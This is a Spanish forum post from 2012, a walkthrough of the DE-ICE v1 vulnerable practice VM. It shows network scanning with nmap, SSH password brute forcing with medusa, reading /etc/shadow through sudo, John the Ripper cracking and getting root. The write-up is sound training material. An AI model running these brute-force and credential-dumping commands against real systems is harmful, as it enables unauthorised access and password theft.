Título: [Relato] Entorno controlado de seguridad DE-Ice v1 Publicado por: cibergolen en 2 Febrero 2012, 23:21 pm Esta vez vengo con DE-Ice v1.0.
Las distribuciónes de seguridad pueden ser descargadas desde Heorot.net. ¿Qué necesitaremos? -Dos máquinas virtuales -De-ICE v1 -Backtrack 5 -Diccionario de claves comunes inglesas ¿Cuáles serán nuestros objetivos? -Mapeo de red -Análisis de red -Fuerza bruta a servicio -Fuerza bruta a shadow -Root ¿Reglas? -No Exploit Allá que vamos Escaneamos las redes para localizar a nuestra presa. Citar netdiscover Currently scanning: 192.168.1.0/16 | Screen View: ARP Reply 1 Captured ARP Reply packets, from 1 hosts. Total size: 60 _____________________________________________________________________________ IP At MAC Address Count Len MAC Vendor ----------------------------------------------------------------------------- 192.168.1.100 08:00:27:b1:50:12 01 060 CADMUS COMPUTER SYSTEMS Identificamos servicvios con NMAP: Citar root@bt:/# nmap -sV 192.168.1.100 Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-02 22:07 CET Nmap scan report for 192.168.1.100 Host is up (0.0070s latency). Not shown: 992 filtered ports PORT STATE SERVICE VERSION 20/tcp closed ftp-data 21/tcp open ftp vsftpd (broken: could not bind listening IPv4 socket) 22/tcp open ssh OpenSSH 4.3 (protocol 1.99) 25/tcp open smtp Sendmail 8.13.7/8.13.7 80/tcp open http Apache httpd 2.0.55 ((Unix) PHP/5.1.2) 110/tcp open pop3 Openwall popa3d 143/tcp open imap UW imapd 2004.357 443/tcp closed https MAC Address: 08:00:27:B1:50:12 (Cadmus Computer Systems) Service Info: Host: slax.example.net; OS: Unix Service detection performed. Please report any incorrect results at http://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 25.29 seconds Dejando huella Vemos que tenemnos varios servicios, excepto uno: FTP. No nos permite conexiones IPv4. Entramos via HTTP, y nos fijamos que la página nos muestra unos correos. Alteremoslos. Esto fue lo que obtuve: Citar addams aadams adaams damsaa adamsa banterb bbanter banterb anterbb bbanteerbb coffeec cooffec ccoffee coooffe cooofef coofefc cooffee Lanzamos medusa tratando de tener suerte. Citar medusa -h 192.168.1.100 -U user -P user -M ssh ¡Bingo! Nos encuentra un usuario. Mismo usuario y clave. Citar ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adaams (3 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: damsaa (4 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: adamsa (5 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: banterb (6 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: bbanter (7 of 16, 6 complete) Password: bbanter (7 of 17 complete) ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: bbanter Password: bbanter [SUCCESS] ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: addams (1 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: aadams (2 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adaams (3 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: damsaa (4 of 17 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: anterbb (8 of 16, 7 complete) Password: adamsa (5 of 17 complete) Decepción Accedo vía SSH: Citar root@bt:/pentest/passwords/john# ssh bbanter@192.168.1.100 bbanter@192.168.1.100's password: Pero si tratamos de hacer un cat /etc/shadow, como es lógico, nos dirá que nuestro siguiente comando es: Citar exit Si antes leemos el /etc/passwd, veremos que el usuario aadams se las trae con otros permisos. Pidiendo auxilio a la medusa Intentemos con otro diccionario: Citar medusa -h 192.168.1.100 -U user -P list.lst -M ssh Citar ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: fuckyou (578 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: matthew (579 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: miller (560 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: ou82 (561 of 675 complete) ACCOUNT FOUND: [ssh] Host: 192.168.1.100 User: aadams Password: nostradamus [SUCCESS] ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: tiger (562 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: trustno1 (563 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: 12345678 (564 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: alex (565 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: windows (566 of 675 complete) ACCOUNT CHECK: [ssh] Host: 192.168.1.100 (1 of 1, 0 complete) User: aadams (7 of 16, 6 complete) Password: flipper (567 of 675 complete) Nos muestra el usuario aadams, con su consiguiente clave. Entramos via SSH, y obtenemos el fichero. Root Success Citar root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100 aadams@192.168.1.100's password: Linux 2.6.16. aadams@slax:~$ sudo cat /etc/shadow Password: root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0::::: bin:*:9797:0::::: daemon:*:9797:0::::: adm:*:9797:0::::: lp:*:9797:0::::: sync:*:9797:0::::: shutdown:*:9797:0::::: halt:*:9797:0::::: mail:*:9797:0::::: news:*:9797:0::::: uucp:*:9797:0::::: operator:*:9797:0::::: games:*:9797:0::::: ftp:*:9797:0::::: smmsp:*:9797:0::::: mysql:*:9797:0::::: rpc:*:9797:0::::: sshd:*:9797:0::::: gdm:*:9797:0::::: pop:*:9797:0::::: nobody:*:9797:0::::: aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7::: bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7::: ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7::: aadams@slax:~$ Salimos. Citar exit Crackeamos. Citar root@bt:/pentest/passwords/john# ./john --rules --wordlist=list.lst shadow El resultado se lo dejo a su imaginación, para no estropear el reto, regalando la clave.Resultado final: Citar root@bt:/pentest/passwords/john# ssh aadams@192.168.1.100 aadams@192.168.1.100's password: Linux 2.6.16. aadams@slax:~$ su Password: ***** root@slax:/home/aadams# whoami root root@slax:/home/aadams# Hasta la próxima. Dedicación: Oversec, CPH, H-Sec, EH Saludos |